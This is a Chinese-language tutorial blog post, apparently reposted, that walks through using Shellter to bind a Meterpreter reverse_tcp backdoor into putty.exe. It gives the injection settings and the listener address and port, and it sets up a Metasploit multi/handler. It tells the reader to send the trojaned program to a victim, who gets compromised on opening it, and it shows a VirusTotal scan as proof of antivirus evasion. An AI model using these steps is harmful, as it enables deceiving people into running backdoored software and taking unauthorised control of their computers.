利用shellter实现对远程机的免杀后门控制

Shellter是一款动态shellcode注入工具。利用它,我们可以将shell注入到其他的可执行程序上,从而躲避安全工具的检查。下面我们来看

Shellter是一款动态shellcode注入工具。利用它,我们可以将shell注入到其他的可执行程序上,从而躲避安全工具的检查。下面我们来看看,如何使用该工具。

首先,我们先来下载该程序。

这是一个Zip的压缩包,我们利用 unzip 命令进行解压。解压后我们进入该目录文件。并设置我们需要的本地shellter类型。因为是用Windows程序进行绑定,因此我们的类型设置成 wineconsole shellter 。

wineconsole shellter

当我们回车后,接下来的界面会让我们选择操作模式。我们选择自动就行了。我们输入 a 。

利用shellter实现对远程机的免杀后门控制

下面,我们选择一个可执行文件,并将其拷贝到 shellter 文件夹下。让它和文件夹下的 shellter.exe 进行绑定。我拷贝的是 putty.exe 程序。这里一定要是可执行文件,才能进行绑定。

利用shellter实现对远程机的免杀后门控制

当我们做好以上操作,我们回到shellter终端。这里要求我们选择一个 绑定目标。我们就填 putty.exe 这样,他就会开始进行绑定。

利用shellter实现对远程机的免杀后门控制

当进程被成功绑定后,这里会列出一些关于payload的选项,要求我们选择一种 payload 类型,进行后续的攻击操作。这里我选择

1 Meterpreter_reverse_tcp

利用shellter实现对远程机的免杀后门控制

这里要求我们进行一些 payload 的基本配置。

LHOST:192.168.0.125 Kali的IP。

LPORT: 7777 监听端口。

利用shellter实现对远程机的免杀后门控制

配置成功后,我们会得到一个verified的确认,表示注入配置成功。我们回车继续操作。

利用shellter实现对远程机的免杀后门控制

现在我们要做的是,配置一个用来处理反弹连接的侦听器。我们打开 MSF 。

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.125

set lport 7777

exploit

做好这步,接下来要做的就是,将植入了后门的程序发送给攻击对象,此时只要受害者打开该执行程序,我们就成功获得了shell 。可以看到对方是 win7 的操作系统 x86架构等信息。

利用shellter实现对远程机的免杀后门控制

我们在 virustotal.com 网站上进行模拟安全扫描,进行病毒检测,我们看到杀毒软件并没有扫到病毒存在。这说明,我们成功绕过了杀毒软件。

利用shellter实现对远程机的免杀后门控制

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://itzsg.com/10260.html

(0)
上一篇 2023年 4月 22日 下午11:57
下一篇 2023年 4月 22日 下午11:57

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

联系我们YX

mu99908888

在线咨询: 微信交谈

邮件:itzsgw@126.com

工作时间:时刻准备着!

关注微信